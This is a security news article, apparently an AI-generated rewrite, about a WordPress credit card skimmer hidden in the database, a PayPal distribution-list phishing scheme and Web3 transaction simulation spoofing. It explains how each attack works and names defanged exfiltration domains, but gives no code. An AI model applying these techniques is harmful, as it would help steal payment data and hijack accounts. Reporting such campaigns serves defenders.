Ethical Hacking News
A recent campaign of credit card skimmers has been identified that are employing stealthy tactics to evade detection by security tools. The malicious actors have been observed injecting malicious JavaScript code into the database tables associated with popular Content Management Systems such as WordPress. This type of credit card skimmer malware is designed to silently inject malicious JavaScript into database entries in order to steal sensitive payment details.
Cybersecurity researchers have identified a new campaign of credit card skimmers that use stealthy tactics to evade detection. The malware injects malicious JavaScript code into WordPress database tables to steal sensitive payment details. The malware activates on checkout pages, hijacking existing payment fields or injecting fake credit card forms. Sucuri discovered the malware embedded in the WordPress wp_options table with the option "widget_block" to avoid detection. The malicious code is injected through the WordPress admin panel and captures users' credit card numbers and expiration dates. The stolen data is transmitted to an attacker-controlled server using Base64-encoding and AES-CBC encryption.
In a concerning development, cybersecurity researchers have identified a new campaign of credit card skimmers that are employing stealthy tactics to evade detection by security tools. The malicious actors have been observed injecting malicious JavaScript code into the database tables associated with popular Content Management Systems (CMS) such as WordPress.
According to Sucuri researcher Puja Srivastava, this particular type of credit card skimmer malware is designed to silently inject malicious JavaScript into database entries in order to steal sensitive payment details. The malware is programmed to activate specifically on checkout pages, either by hijacking existing payment fields or injecting a fake credit card form.
"This credit card skimmer malware targeting WordPress websites silently injects malicious JavaScript into database entries to steal sensitive payment details," Srivastava explained in her recent analysis. "The malware activates specifically on checkout pages, either by hijacking existing payment fields or injecting a fake credit card form."
The GoDaddy-owned security company Sucuri discovered the malware embedded into the WordPress wp_options table with the option "widget_block." This allowed it to avoid detection by scanning tools and persist on compromised sites without attracting attention.
The malicious code was found to be injected through the WordPress admin panel, specifically within an HTML block widget. The JavaScript code works by checking if the current page is a checkout page and springs into action only after the site visitor is about to enter their payment details.
At this point, the rogue script dynamically creates a bogus payment screen that mimics legitimate payment processors like Stripe. The form is designed to capture users' credit card numbers, expiration dates, CVV numbers, and billing information.
Alternatively, the malware is also capable of capturing data entered on legitimate payment screens in real-time to maximize compatibility. The stolen data is subsequently Base64-encoded and combined with AES-CBC encryption to make it appear harmless and resist analysis attempts.
In the final stage, the data is transmitted to an attacker-controlled server ("valhafather[.]xyz" or "fqbe23[.]xyz"). This campaign marks a significant escalation in the stealthy tactics employed by credit card skimmers.
The development comes more than a month after Sucuri highlighted a similar campaign that leveraged JavaScript malware to dynamically create fake credit card forms or extract data entered in payment fields on checkout pages. However, this new variant appears to be even more sophisticated and difficult to detect.
In related news, cybersecurity researchers have also identified a phishing email campaign that tricks recipients into clicking on PayPal login pages under the guise of an outstanding payment request. The scammer appears to have simply registered an Microsoft 365 test domain and created a distribution list containing victim emails.
On the PayPal web portal, they simply request the money and add the distribution list as the address. What makes this campaign sneaky is that the messages originate from a legitimate PayPal address (service@paypal.com) and contain a genuine sign in URL, which allows the emails to slip past security tools.
As soon as the victim attempts to login to their PayPal account about the payment request, their account is automatically linked to the email address of the distribution list, permitting the threat actor to hijack control of the account.
Furthermore, malicious actors have also been observed leveraging a novel technique called transaction simulation spoofing to steal cryptocurrency from victim wallets. Modern Web3 wallets incorporate transaction simulation as a user-friendly feature that allows users to preview the expected outcome of their transactions before signing them.
However, attackers have found ways to exploit this mechanism, taking advantage of the time gap between transaction simulation and execution to set up fake sites mimicking decentralized apps (DApps) in order to carry out fraudulent wallet draining attacks. This new attack vector represents a significant evolution in phishing techniques and makes detection particularly challenging.
Related Information:
https://thehackernews.com/2025/01/wordpress-skimmers-evade-detection-by.html
Published: Mon Jan 13 01:24:08 2025 by llama3.2 3B Q4_K_M
